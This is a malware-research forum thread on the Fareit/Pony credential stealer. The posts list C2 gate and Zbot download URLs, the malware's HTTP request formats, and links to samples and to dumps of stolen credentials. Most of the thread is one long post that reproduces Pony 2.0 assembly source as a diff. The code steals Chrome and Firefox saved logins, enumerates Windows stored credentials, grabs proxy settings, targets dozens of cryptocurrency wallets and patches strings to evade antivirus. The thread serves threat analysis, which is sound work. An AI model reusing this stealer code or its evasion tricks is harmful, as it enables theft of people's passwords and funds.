Win32/Fareit

Forum for analysis and discussion about malware.
unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Win32/Fareit

Post by unixfreaxjp » Tue Jul 30, 2013 5:13 pm

Spam campaign attachment:
Image
Download header used:

Code: Select all

GET %s HTTP/1.0
Host: %s
Accept-Language: en-US
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: %s (Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0))
Credential posted to gates with below header format:

Code: Select all

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)
POST %s HTTP/1.0
Host: %s
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: %lu
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: %s
Content-Length:
Location:
HWID
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
Access to facebook to the setting bars..

Code: Select all

2http://www.facebook.com/
abe2869f-9b47-4cd9-a358-c22904dba7f7
pSettings
aPlib cmpressor's trace:

Code: Select all

aPLib v1.01  -  the smaller the better :)
Copyright (c) 1998-2009 by Joergen Ibsen, All Rights Reserved.
More information: http://www.ibsensoftware.com/
Pony gates:

Code: Select all

hxxp://webmail.alsultantravel.com:8080/forum/viewtopic.php
hxxp://alsultantravel.com:8080/forum/viewtopic.php
hxxp://webmail.alsultantravel.info:8080/forum/viewtopic.php
hxxp://198.57.130.35:8080/forum/viewtopic.php
Download Zbots:

Code: Select all

hxxp://198.57.130.35:8080/forum/viewtopic.php
hxxp://bremertondisciples.org/p6AERteJ.exe
hxxp://proactionpt.com/7dPmE3P.exe
hxxp://ruffledpaper.com/N7SvZ.exe
Assembly trace:

Code: Select all

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="5.1.0.0" processorArchitecture="x86" name="Progmn.Program_Code" type="win32"></assemblyIdentity><description>Program Description</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo></assembly>
VT:
https://www.virustotal.com/en/file/9f06 ... /analysis/
Note:
credential list slurped is unchanged.
You do not have the required permissions to view the files attached to this post.

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Win32/Fareit

Post by unixfreaxjp » Tue Jul 30, 2013 5:22 pm

*) My post took too much space, I am sorry. I'll make shorter. The details which are same as previous posted will not be written here. Spam campaign again:
Image
Gates:

Code: Select all

hxxp://webmail.alsultantravel.com:8080/forum/viewtopic.php
hxxp://alsultantravel.com:8080/forum/viewtopic.php
hxxp://webmail.alsultantravel.info:8080/forum/viewtopic.php
hxxp://198.57.130.35:8080/forum/viewtopic.php
Zbots Downloads:

Code: Select all

hxxp://www.energiereise-namaste.de/EggT.exe
hxxp://www.labycar.com/Zi6L.exe
hxxp://208.112.50.5/c38QVmd.exe
hxxp://s148231503.onlinehome.us/y3R.exe
VT:
https://www.virustotal.com/en/file/4c10 ... /analysis/
You do not have the required permissions to view the files attached to this post.

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Win32/Fareit

Post by unixfreaxjp » Wed Jul 31, 2013 10:50 am

Three spams with fareit attachments as usual came in today:
The templates are as per below snapshots:
Image
VT:
https://www.virustotal.com/en/file/b2f7 ... /analysis/
https://www.virustotal.com/en/file/b2f7 ... /analysis/
https://www.virustotal.com/en/file/dfce ... /analysis/

The first and second posted credentials to below pony gates:

Code: Select all

h00p://www.arki.com:8080/ponyb/gate.php
h00p://arki.com:8080/ponyb/gate.php
h00p://50.57.185.72:8080/ponyb/gate.php
h00p://deltaoutriggercafe.com/ponyb/gate.php
and downloading these zbots:

Code: Select all

h00p://magic-crystal.ch/0ijiK8Y.exe
h00p://chartomresidence.com/j7qtsL.exe
h00p://ftp.petrasolutions.com/REXLa9.exe
the last one is posting creds to the below pony gates:

Code: Select all

h00p://www.arki.com:8080/ponyb/gate.php
h00p://arki.com:8080/ponyb/gate.php
h00p://50.57.185.72:8080/ponyb/gate.php
h00p://deltadazeresort.net/ponyb/gate.php
and downloading these zbots

Code: Select all

h00p://www.giftedintuitive.com/kQYjoPqY.exe
h00p://198.61.134.93/MM75.exe
h00p://ftp.jason-tooling.com/nhdx.exe
h00p://paulalfrey.com/guBwFA.exe
I took alive Zbots download URL snapshots w/URLquery, so people can use it as evidence for clean up purpose.
So far this is the list, use it at will: http://pastebin.com/raw.php?i=My0JHXGp
Sample can be downloaded via this: http://www.mediafire.com/?clcc8xrehg90qj8

#MalwareMustDie!!

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Win32/Fareit

Post by unixfreaxjp » Fri Aug 02, 2013 10:08 am

Today's campaign...As usual, no changes.
Image
VT: https://www.virustotal.com/en/file/71df ... 375431000/
Gates:

Code: Select all

h00p://www.arki.com:8080/ponyb/gate.php
h00p://arki.com:8080/ponyb/gate.php
h00p://50.57.185.72:8080/ponyb/gate.php
h00p://bettersigns.net/ponyb/gate.php
and download zbots from:

Code: Select all

h00p://ftp.evolplay.org/bzfBGWP.exe
h00p://www.giftedintuitive.com/kQYjoPqY.exe
h00p://198.61.134.93/MM75.exe
h00p://ftp.jason-tooling.com/nhdx.exe
FYI. Here's the credential data slurped: http://pastebin.com/raw.php?i=pxzThmHS
Sample to download: http://www.mediafire.com/?a18eybj053j38rf

#MalwareMustDie! (not a promotion, a share)

patriq
Posts: 109
Joined: Fri Jun 28, 2013 8:11 pm
Contact:

Re: Win32/Fareit

Post by patriq » Sat Jun 21, 2014 3:58 pm

Found something that appears to be Pony 2.0

http://protectyournet.blogspot.com/2014 ... er-20.html

Panel and samples attached. Samples are directly from this new builder.

What are your thoughts?
You do not have the required permissions to view the files attached to this post.

wacked2
Posts: 19
Joined: Sat Dec 17, 2011 3:25 pm

Re: Win32/Fareit

Post by wacked2 » Sun Jun 22, 2014 2:47 pm

The wallet stealers just use AppDataCommonFileScan.
The TDS feature in the panel is just a normal download command.
Still uses "Host:" and "Connection: close" with HTTP/1.0
It's still mainly a Multi Password Recovery mod.

(Haven't looked into the loader)
(Only partly analyzed, couldn't find a way to remove AntiDisasmTrick with IDA)
You do not have the required permissions to view the files attached to this post.

forty-six
Posts: 66
Joined: Tue Sep 03, 2013 3:23 pm

Re: Win32/Fareit

Post by forty-six » Fri Jun 27, 2014 2:49 am

@patriq Looks like you weren't alone in that discovery:

https://blog.damballa.com/archives/2558

(from article)

Code: Select all

http://pastebin.com/k96W1bPy

User avatar
Xylitol
Global Moderator
Posts: 1652
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Re: Win32/Fareit

Post by Xylitol » Fri Jun 27, 2014 1:10 pm

Here is some code modifications i've spotted on the 2.0 compared with 1.9 stub source
May i've missed some part, but most of the modifications are here i think.
PasswordModules.asm:

Code: Select all

Line 11 (remove of an useless .code, and definitions added):
ITEMHDR_ID					equ 0beef0000h

Line 109 (code addition):
MODULE_BITCOIN				equ 00000061h
MODULE_ELECTRUM				equ 00000062h
MODULE_MULTIBIT				equ 00000063h
MODULE_FTPDISK				equ	00000064h
MODULE_LITECOIN				equ	00000065h
MODULE_NAMECOIN				equ	00000066h
MODULE_TERRACOIN			equ 00000067h
MODULE_BITCOINARMORY		equ 00000068h
MODULE_PPCOIN				equ 00000069h
MODULE_PRIMECOIN			equ 0000006ah
MODULE_FEATHERCOIN			equ 0000006bh
MODULE_NOVACOIN				equ 0000006ch
MODULE_FREICOIN				equ 0000006dh
MODULE_DEVCOIN				equ 0000006eh
MODULE_FRANKOCOIN			equ 0000006fh
MODULE_PROTOSHARES			equ 00000070h
MODULE_MEGACOIN				equ 00000071h
MODULE_QUARKCOIN			equ 00000072h
MODULE_WORLDCOIN			equ 00000073h
MODULE_INFINITECOIN			equ 00000074h
MODULE_IXCOIN				equ 00000075h
MODULE_ANONCOIN				equ 00000076h
MODULE_BBQCOIN				equ 00000077h
MODULE_DIGITALCOIN			equ 00000078h
MODULE_MINCOIN				equ 00000079h
MODULE_GOLDCOIN				equ 0000007ah
MODULE_YACOIN				equ 0000007bh
MODULE_ZETACOIN				equ 0000007ch
MODULE_FASTCOIN				equ 0000007dh
MODULE_I0COIN				equ 0000007eh
MODULE_TAGCOIN				equ 0000007fh
MODULE_BYTECOIN				equ 00000080h
MODULE_FLORINCOIN			equ 00000081h
MODULE_PHOENIXCOIN			equ 00000082h
MODULE_LUCKYCOIN			equ 00000083h
MODULE_CRAFTCOIN			equ 00000084h
MODULE_JUNKCOIN				equ 00000085h


; collect proxy settings stored in browsers (HTTP/HTTPS password grabbing must be enabled in builder!)
COLLECT_PROXY_SETTINGS		equ 1

Line 198 (just a procedure rename):
invoke	IsDataAlreadyProcessed, map.lpMem, map.dwFileSize
					
Line 235 (just to match the procedure rename):
IsFileAlreadyProcessed proc uses ebx path
Line 248 (just to match the procedure rename):
invoke	IsDataAlreadyProcessed, map.lpMem, map.dwFileSize
Line 261 (just to match the procedure rename):
IsFileAlreadyProcessed endp

Line 442:
; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Windows (WinInet) Proxy Settings (used for IE and Chrome based browsers)
; SFTP: not supported

.data
	CProxySettingsRegPath					db	'Software\Microsoft\Windows\CurrentVersion\Internet Settings',0
	CProxySettingsRegValue					db	'ProxyServer',0

.code

IFDEF COLLECT_PROXY_SETTINGS

GrabProxySettings proc stream, item_id
	LOCAL	len: DWORD
	LOCAL	mem: DWORD

	mov	len, 0
	invoke	RegReadValueStr, dwCurrentUserKey, offset CProxySettingsRegPath, offset CProxySettingsRegValue, addr len
	.IF	eax
		mov	mem, eax	
		invoke	CommonAppendDataStr, stream, mem, item_id
		invoke	MemFree, mem		
	.ENDIF

	ret
GrabProxySettings endp

ENDIF

Line 476 (code clean-up):
the .data containing this vanished:
	szHWIDValue		db	"HWID",0
	szGUIDFmt		db	"{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}",0

	win64_getnative		db	"GetNativeSystemInfo",0
	win64_kernel		db	"kernel32.dll",0
	win64_process		db	"IsWow64Process",0

IsWin64 procedure vanished from the code but is called line 518
IsAdmin procedure vanished from the code but is called line 533
InstallHWIDValue procedure vanished from the code but is called line 537

Line 591 (2 comments added):
; Tested: Far Manager v3.0 build 3367 x86
; Tested: Far Manager v3.0 build 3525 x86

Line 747 (comment added for the Windows/Total Commander proc):
; Tested: 8.01 64 bit (Release)

Line 837 (code added, Windows/Total Commander proc):
	mov byte ptr[CWTCIni], 'w'
	mov	byte ptr[CWTCRegPath1+9], 'G'
	mov	byte ptr[CWTCRegPath2+9], 'G'

Line 927 (comment added):
; Tested: WS_FTP Pro 12.4

Line 1123 (added definition for CuteFTP 9):
CCuteFTP_RegPath7	db	"Software\GlobalSCAPE\CuteFTP 9\QCToolbar",0
Line 1286 (added definition for CuteFTP 9):
invoke	CuteFTPProcessQuickConnections, stream, offset CCuteFTP_RegPath7

Line 1306 (no idea if it's bugfix or error in my 1.9 package)
anyway this concern just a letter fix for path name in FlashFXP dirs not really a major change (if this is one)

Line 1378 (code/comment addition):
	; AV-FIXes
	mov	byte ptr[CFlashFXP_RegPath1], 'S'
	mov	byte ptr[CFlashFXP_RegPath2], 'S'
	mov	byte ptr[CFlashFXP_RegPath3], 'S'
	mov	byte ptr[CFlashFXP_HistoryName+1], 'H'
	
Line 1812 (code addition):
	mov	byte ptr[CSmartFTPHistMask], 'H'
	
Line 1868 (code addition):
	mov	byte ptr[CTurboFTPDatMask], 'a'

Line 3747 (comment addition):
; Tested: 16.0.1196.73 (Chrome based)

Line 3767 (code addition):
	COperaNewAppDataDir	db	'\Opera Software',0

Line 4219 (procedure rename, refere to line 198):
invoke	IsFileAlreadyProcessed, lpFileName

Line 4408 (code addition):
ChromeCommonScanCustomID proto :DWORD, :DWORD, :DWORD

Line 4447 (code addition):
invoke	ChromeCommonScanCustomID, stream, offset COperaNewAppDataDir, ITEMHDR_ID or 2

Line 4599 (comment edit):
; FTP Voyager 11.x-16.x
Line 4601: (comment edit):
; Tested: Version 16.1.0.0
Line 4610: (code addition):
	CFTPVoyagerProfileFile2	db	'FTPVoyager.ftp.backup',0
	CFTPVoyagerProfileFile3	db	'FTPVoyager.ftp.old.backup',0

Line 4623 (code addition):
		push	eax
		push	eax
		invoke	CommonFileScan, stream, eax, offset CFTPVoyagerProfileFile1, ITEMHDR_ID or 0
		pop	eax
		invoke	CommonFileScan, stream, eax, offset CFTPVoyagerProfileFile2, ITEMHDR_ID or 0
		pop	eax
		invoke	CommonFileScan, stream, eax, offset CFTPVoyagerProfileFile3, ITEMHDR_ID or 0

Line 4703 (code delete):
szSQLite3Imports vanished

Line 4726 (code delete):
szSQLiteMozillaQuery vanished

Line 4737: (code added):
	IFDEF	COLLECT_PROXY_SETTINGS
	szMozillaProxy		db	'moz-proxy://',0
	ENDIF

Line 4896 (code deletion/addition):
MozillaReadSQLColData whole procedure replaced by: ProcessMozillaSQLiteFile proto :DWORD, :DWORD, :DWORD

Line 4898 (code deletion):
Removed into the MozillaReadSQLFile proc the DWORD definitions

line 4904 (procedure rename, refere to line 198):
invoke	IsFileAlreadyProcessed, szSQLFile

Line 4915 (comment added/code deleted)
; Process SQLite3 database using tiny db engine
LoadDllImports vanished replaced by: 	invoke	ProcessMozillaSQLiteFile, stream, szSQLFile, ITEMHDR_ID or 0

Line 4917 (additional code remove about the sqlite3 db)

Line 4967 (procedure rename, refere to line 198):
	invoke	IsFileAlreadyProcessed, szSignonsFile

Line 5071 (code addition):
	IFDEF	COLLECT_PROXY_SETTINGS
	.IF	eax
		invoke	lstrlen, offset szMozillaProxy
		invoke	StrCmpNI, host_line, offset szMozillaProxy, eax
	.ENDIF

Line 5212 (code addition):
	IFDEF COLLECT_PROXY_SETTINGS
		invoke	StrStrI, ininame, offset szMozillaPrefsJS
		.IF	eax
			invoke	PonyStrCat, dir, offset szSlash
			invoke	PonyStrCatFreeArg1, eax, ininame
			push	eax
			invoke	CommonAppendFile, stream, eax, ITEMHDR_ID or 1
			call	MemFree
		.ENDIF
	ENDIF

Line 61008 (procedure added):
PSExportAUser proc dwType, lpName, lpUser, pData, pDataLen, stream
	invoke	StreamWriteDWORD, stream, dwType

	invoke	lstrlenA, lpName
	inc	eax ; NULL

	invoke	StreamWriteBinaryString, stream, lpName, eax
	invoke	StreamWriteBinaryString, stream, pData, pDataLen

	invoke	lstrlenA, lpUser
	inc	eax ; NULL

	invoke	StreamWriteBinaryString, stream, lpUser, eax
	ret
PSExportAUser endp

Line 6418 (code addition):
szIE7CredAll	db	'*',0
Line 6420 (code addition):
szIE7Comment	db	'SspiPfc',0

Line 6498 (code addition):
	IFDEF COLLECT_PROXY_SETTINGS
		.IF	MyCredFree && MyCredEnumerate && MyCryptUnprotectData
			mov	pCred, NULL
			mov	Count, 0
			lea	eax, pCred
			push	eax
			lea	eax, Count
			push	eax
			push	0
			push	offset szIE7CredAll
			call	MyCredEnumerate
			.IF	eax && Count && pCred
				mov	esi, pCred
				.WHILE	Count && dword ptr[esi]
					push	esi
					mov	esi, dword ptr[esi]

					invoke	lstrcmpi, dword ptr[esi].CREDENTIAL._Comment, offset szIE7Comment
					.IF	!eax
						m2m	InBlob.cbData, dword ptr[esi].CREDENTIAL.CredentialBlobSize
						m2m	InBlob.pbData, dword ptr[esi].CREDENTIAL.CredentialBlob
						
						.IF	InBlob.cbData
							invoke	PSExportAUser, ITEMHDR_ID or 6, [esi].CREDENTIAL.TargetName, [esi].CREDENTIAL.UserName, InBlob.pbData, InBlob.cbData, stream
							invoke	LocalFree, OutBlob.pbData
						.ENDIF
					.ENDIF

					pop	esi
					dec	Count
					add	esi, 4
				.ENDW
				push	pCred
				call	MyCredFree
			.ENDIF
		.ENDIF
	ENDIF
	
Line 6547 (code addition):
	IFDEF COLLECT_PROXY_SETTINGS
		invoke	GrabProxySettings, stream, ITEMHDR_ID or 5
	ENDIF

Line 6929 (code addition):
ELSEIFDEF COMPILE_MODULE_OPERA
	COMPILE_CHROMIUM_CODE	equ	1
Line 6934 code addition):
	COMPILE_SQLITE3_CODE	equ	1
ELSEIFDEF COMPILE_MOZILLA_CODE
	COMPILE_SQLITE3_CODE	equ	1
ENDIF

IFDEF COMPILE_SQLITE3_CODE

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Line 6945 (code addition):
	CChromeWebData		db	'Web Data',0
	CChromeLoginData	db	'Login Data',0
	
Line 6953 (code deletion):
deleted some datas related to chrome (szChromeLoginTable, szChromeActionURL, szChromePassValue, [...] szChromeHTTPS	

Line 6956 (code deletion):
dwChromeActionURL, dwChromePassValue, dwChromeUserValue
	
Line 7163 (line replace):
mov	eax, TRUE -> invoke	SQLiteBuildDataRecord, NULL, 0, SQLITE_DATATYPE_OTHER, lpDataOut

Line 7229 (comment edition):
; Get data length & pointer for a single cell from 1-dim record array

Line 7378 (code edition):
added 'item_id' into the SQLiteReadPage proc
Line 7488 (code edition):
Same edition as line 7378.
	
Line 7578 (code addition):
push	item_id
	
Line 7596 (code deletion):
Process SQL column definitions
	
Line 7598 (code edition):
added callback_func to SQLiteProcessSQL procedure

Line 7608 (instruction added):
cld

Line 7665 (comment edition):
; Replace double space chars to single space chars ('  ' -> ' ')

Line 7681 (comment edition):
; Process column definitions one by one

Line 7688 (code edition):
replaced invoke SQLiteProcessCol by:
			push	nCol
			push	esi
			call	callback_func
			
Line 7700 (code edition):
same edition as line 7688.

Line 7707 (code addition):
ProcessSQLiteStream proc stream, target_stream, item_id, callback_func
	LOCAL	header[16]: BYTE
	LOCAL	dwStatusCode: DWORD
	
	; Read database header
	
	invoke	StreamGotoBegin, stream
	invoke	StreamRead, stream, addr header, sizeof header
	.iF	!eax
		ret
	.ENDIF
	
	invoke	CompareMem, addr header, offset szSQLite3Header, sizeof header
	.IF	!eax
		ret
	.ENDIF

	mov	dwStatusCode, TRUE
	invoke	Stream_SafeReadWORD, stream, addr dwStatusCode
	.IF	!eax || !dwStatusCode
		sub	eax, eax
		ret
	.ENDIF
	
	; Validate page size
	push	eax
	sub	ecx, ecx
	.WHILE	eax
		shr	eax, 1
		.IF	CARRY?
			inc	ecx
		.ENDIF
	.ENDW
	pop	eax
	
	.IF	eax == 1
		mov	eax, 65536
	.ENDIF
	
	; Page size must be power of 2
	.IF	ecx != 1
		sub	eax, eax
		ret
	.ENDIF
	mov	dwSQLitePageSize, eax

	; File format write version
	invoke	Stream_SafeReadByte, stream, addr dwStatusCode
	.IF	((eax != 1) && (eax != 2)) || ! dwStatusCode
		sub	eax, eax
		ret
	.ENDIF

	; File format read version
	invoke	Stream_SafeReadByte, stream, addr dwStatusCode
	.IF	((eax != 1) && (eax != 2)) || ! dwStatusCode
		sub	eax, eax
		ret
	.ENDIF
	
	; Reserved bytes
	invoke	Stream_SafeReadByte, stream, addr dwStatusCode
	.IF	eax != 0 || ! dwStatusCode
		sub	eax, eax
		ret
	.ENDIF

	; Maximum embedded payload fraction
	invoke	Stream_SafeReadByte, stream, addr dwStatusCode
	.IF	eax != 64 || ! dwStatusCode
		sub	eax, eax
		ret
	.ENDIF

	; Minimum embedded payload fraction
	invoke	Stream_SafeReadByte, stream, addr dwStatusCode
	.IF	eax != 32 || ! dwStatusCode
		sub	eax, eax
		ret
	.ENDIF
	
	; Leaf payload fraction
	invoke	Stream_SafeReadByte, stream, addr dwStatusCode
	.IF	eax != 32 || ! dwStatusCode
		sub	eax, eax
		ret
	.ENDIF
	invoke	Stream_SafeReadSkip, stream, 4*8, addr dwStatusCode
	
	; Database text encoding
	invoke	Stream_SafeReadDWORD, stream, addr dwStatusCode
	.IF	(eax < 1) || (eax > 3) || (!dwStatusCode)
		sub	eax, eax
		ret
	.ENDIF
	
	mov	dwSQLiteEncoding, eax
	
	invoke	Stream_SafeReadSkip, stream, 40, addr dwStatusCode
	
	; Start database processing from page 1
	invoke	SQLiteReadPage, stream, target_stream, 1, addr dwStatusCode, item_id, callback_func
	
	ret
ProcessSQLiteStream endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Common chromium decryption

IFDEF COMPILE_CHROMIUM_CODE

.data
	CChromeWebData		db	'Web Data',0
	CChromeLoginData	db	'Login Data',0
	szChromeLoginTable 	db	'logins',0
	szChromeActionURL	db	'origin_url',0
	szChromePassValue	db	'password_value',0
	szChromeUserValue	db	'username_value',0
	szChromeFTP			db	'ftp://',0
	IFDEF	GRAB_HTTP
	szChromeHTTP		db	'http://',0
	szChromeHTTPS		db	'https://',0
	ENDIF

.data?
	dwChromeActionURLIndex	dd	?
	dwChromePassValueIndex	dd	?
	dwChromeUserValueIndex	dd	?
.code

; Process SQL column definition 
SQLiteProcessChromeColDef proc uses edi column_definition, column_index
	invoke	Trim, column_definition
	invoke	StrStrI, column_definition, offset szSQLiteSpaceChar
	.IF	!eax
		ret
	.ENDIF
	mov	byte ptr[eax], 0
	invoke	Trim, column_definition
	
	mov	edi, offset szSQLiteStopWords
@@:
	invoke	lstrcmpi, edi, column_definition
	.IF	!eax
		ret
	.ENDIF
	@Next	@B
	
	invoke	lstrlen, column_definition
	.IF	!eax
		ret
	.ENDIF
	
	invoke	lstrcmpi, column_definition, offset szChromeActionURL
	.IF	!eax
		m2m	dwChromeActionURLIndex, column_index
	.ENDIF
	
	invoke	lstrcmpi, column_definition, offset szChromePassValue
	.IF	!eax
		m2m	dwChromePassValueIndex, column_index
	.ENDIF

	invoke	lstrcmpi, column_definition, offset szChromeUserValue
	.IF	!eax
		m2m	dwChromeUserValueIndex, column_index
	.ENDIF

	mov	eax, TRUE
	ret
SQLiteProcessChromeColDef endp
; Process chrome password data row
SQLiteProcessChromeDataTable proc uses esi edi stream, target_stream, row_array, cell_count, item_id

Line: 7904 (line edition):
dwChromeActionURL -> dwChromeActionURLIndex
dwChromePassValue -> dwChromePassValueIndex
dwChromeUserValue -> dwChromeUserValueIndex

Line 7906 (line edition):
dwChromeActionURL -> dwChromeActionURLIndex
Line 7907 (line edition):
dwChromePassValue -> dwChromePassValueIndex
Line 7908 (line edition):
dwChromeUserValue -> dwChromeUserValueIndex

Line 7960 (line edition):
ITEMHDR_ID or 0 -> item_id

Line 7974 (line edition):
SQLiteProcessDataTable endp -> SQLiteProcessChromeDataTable endp

Line 7985 (line edition):
SQLiteProcessSchemaTable -> SQLiteProcessChromeSchemaTable

Line 8011 code edition):
mov	dwChromeActionURL, -1 -> mov dwChromeActionURLIndex, -1
Line 8012 code edition):
mov	dwChromePassValue, -1 -> mov dwChromePassValueIndex, -1
Line 8013 code edition):
mov	dwChromeUserValue, -1 -> mov dwChromeUserValueIndex, -1

Line 8015 (line edition):
invoke	SQLiteProcessSQL, cell_data, offset SQLiteProcessChromeColDef

Line 8018 (code edition):
.IF	(dwChromeActionURLIndex != -1) && (dwChromePassValueIndex != -1) && (dwChromeUserValueIndex != -1)
Line 8019 (code edition):
invoke	SQLiteReadPage, stream, target_stream, root_page, addr dwStatusCode, item_id, offset SQLiteProcessChromeDataTable

Line 8029 (procedure rename):
SQLiteProcessChromeSchemaTable endp

Line 8031 (procedure modification):
ProcessChromeSQLiteFile proc target_stream, szSQLFileName, item_id
	LOCAL	stream: DWORD

	invoke	StreamCreate, addr stream
	invoke	StreamLoadFromFile, szSQLFileName, stream
	.IF	eax
		invoke	ProcessSQLiteStream, stream, target_stream, item_id, offset SQLiteProcessChromeSchemaTable
		.IF	!eax
			; Error occured while processing ".sqlite" file
			; Send ".sqlite" file for debugging
			;invoke	CommonAppendFileForceDupe, target_stream, lpFileName, ITEMHDR_ID or 1000h
		.ENDIF

Line 8029 (just a renamed of the end of the proc.):
SQLiteProcessChromeSchemaTable endp

Line 8031 (rewrote of the proc):
ProcessChromeSQLiteFile proc target_stream, szSQLFileName, item_id
	LOCAL	stream: DWORD

	invoke	StreamCreate, addr stream
	invoke	StreamLoadFromFile, szSQLFileName, stream
	.IF	eax
		invoke	ProcessSQLiteStream, stream, target_stream, item_id, offset SQLiteProcessChromeSchemaTable
		.IF	!eax
			; Error occured while processing ".sqlite" file
			; Send ".sqlite" file for debugging
			;invoke	CommonAppendFileForceDupe, target_stream, lpFileName, ITEMHDR_ID or 1000h
		.ENDIF

Line 8044 (code addition):
invoke	StreamFree, stream

Line 8046 (proc code addition):
	ret
ProcessChromeSQLiteFile endp

ChromeAppDataCommonSingleFileScan proc stream, csidl, appdata_dir, config_file, item_id
	invoke	SHGetFolderPathStr, csidl
	.IF	eax
		invoke	PonyStrCatFreeArg1, eax, appdata_dir
		push	eax
		invoke	CommonFileScanCallback, stream, eax, config_file, item_id, offset ProcessChromeSQLiteFile
		call	MemFree

Line 8057 (code addition):
	ret
ChromeAppDataCommonSingleFileScan endp

Line 8060 (proc code addition):
ChromeCommonScanCustomID proc stream, base_appdata_dir, id
	invoke	ChromeAppDataCommonSingleFileScan, stream, CSIDL_APPDATA, base_appdata_dir, offset CChromeWebData, id
	invoke	ChromeAppDataCommonSingleFileScan, stream, CSIDL_APPDATA, base_appdata_dir, offset CChromeLoginData, id
	invoke	ChromeAppDataCommonSingleFileScan, stream, CSIDL_LOCAL_APPDATA, base_appdata_dir, offset CChromeWebData, id
	invoke	ChromeAppDataCommonSingleFileScan, stream, CSIDL_LOCAL_APPDATA, base_appdata_dir, offset CChromeLoginData, id
	invoke	ChromeAppDataCommonSingleFileScan, stream, CSIDL_COMMON_APPDATA, base_appdata_dir, offset CChromeWebData, id
	invoke	ChromeAppDataCommonSingleFileScan, stream, CSIDL_COMMON_APPDATA, base_appdata_dir, offset CChromeLoginData, id
	ret
ChromeCommonScanCustomID endp

ChromeCommonScan proc stream, base_appdata_dir
	invoke	ChromeCommonScanCustomID, stream, base_appdata_dir, ITEMHDR_ID or 0
	ret
ChromeCommonScan endp

ENDIF

IFDEF COMPILE_MOZILLA_CODE

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Common Mozilla SQLite3 database decryption

.data
	szMozillaLoginTable db	'moz_logins',0
	szMozillaActionURL	db	'hostname',0
	szMozillaPassValue	db	'encryptedPassword',0
	szMozillaUserValue	db	'encryptedUsername',0

.data?
	dwMozillaActionURLIndex	dd	?
	dwMozillaPassValueIndex	dd	?
	dwMozillaUserValueIndex	dd	?

.code

; Process SQL column definition 
SQLiteProcessMozillaColDef proc uses edi column_definition, column_index
	invoke	Trim, column_definition
	invoke	StrStrI, column_definition, offset szSQLiteSpaceChar
	.IF	!eax
	
Line 8102 (code addition):
	mov	byte ptr[eax], 0
	invoke	Trim, column_definition

Line 8105 (code addition/deletion):
	mov	edi, offset szSQLiteStopWords
@@:
	invoke	lstrcmpi, edi, column_definition
	.IF	!eax

line 8113 (code addition/deletion):
invoke	lstrlen, column_definition
	.IF	!eax

Line 8118 (code addition/remove):
	invoke	lstrcmpi, column_definition, offset szMozillaActionURL
	.IF	!eax
		m2m	dwMozillaActionURLIndex, column_index
		
Line 8123 (code addition/remove):
	invoke	lstrcmpi, column_definition, offset szMozillaPassValue
	.IF	!eax
		m2m	dwMozillaPassValueIndex, column_index

Line 8128 (code addition/deletion):
	invoke	lstrcmpi, column_definition, offset szMozillaUserValue
	.IF	!eax
		m2m	dwMozillaUserValueIndex, column_index

Line 8133 (code addition/deletion):
	mov	eax, TRUE
	ret
SQLiteProcessMozillaColDef endp

; Process password data row
SQLiteProcessMozillaDataTable proc stream, target_stream, row_array, cell_count, item_id
	LOCAL	url_cell_len: DWORD
	LOCAL	url_cell_type: DWORD
	LOCAL	url_cell_data: DWORD
	LOCAL	user_cell_len: DWORD
	LOCAL	user_cell_type: DWORD
	LOCAL	user_cell_data: DWORD
	LOCAL	pass_cell_len: DWORD
	LOCAL	pass_cell_type: DWORD
	LOCAL	pass_cell_data: DWORD
	LOCAL	host: DWORD
	LOCAL	user: DWORD
	LOCAL	pass: DWORD

	.IF	!cell_count

Line 8155 (code addition/deletion):
	mov	eax, cell_count
	.IF	(dwMozillaActionURLIndex < eax) && (dwMozillaPassValueIndex < eax) && (dwMozillaUserValueIndex < eax)
		; Get cell values
		invoke	SQLiteGetRecordArrayCell, row_array, dwMozillaActionURLIndex, addr url_cell_len, addr url_cell_type, addr url_cell_data
		invoke	SQLiteGetRecordArrayCell, row_array, dwMozillaUserValueIndex, addr user_cell_len, addr user_cell_type, addr user_cell_data
		invoke	SQLiteGetRecordArrayCell, row_array, dwMozillaPassValueIndex, addr pass_cell_len, addr pass_cell_type, addr pass_cell_data

		.IF	url_cell_len && pass_cell_len
			mov	edx, url_cell_len
			inc	edx
			invoke	MemAlloc, edx
			mov	host, eax
			invoke	MoveMem, url_cell_data, host, url_cell_len
		
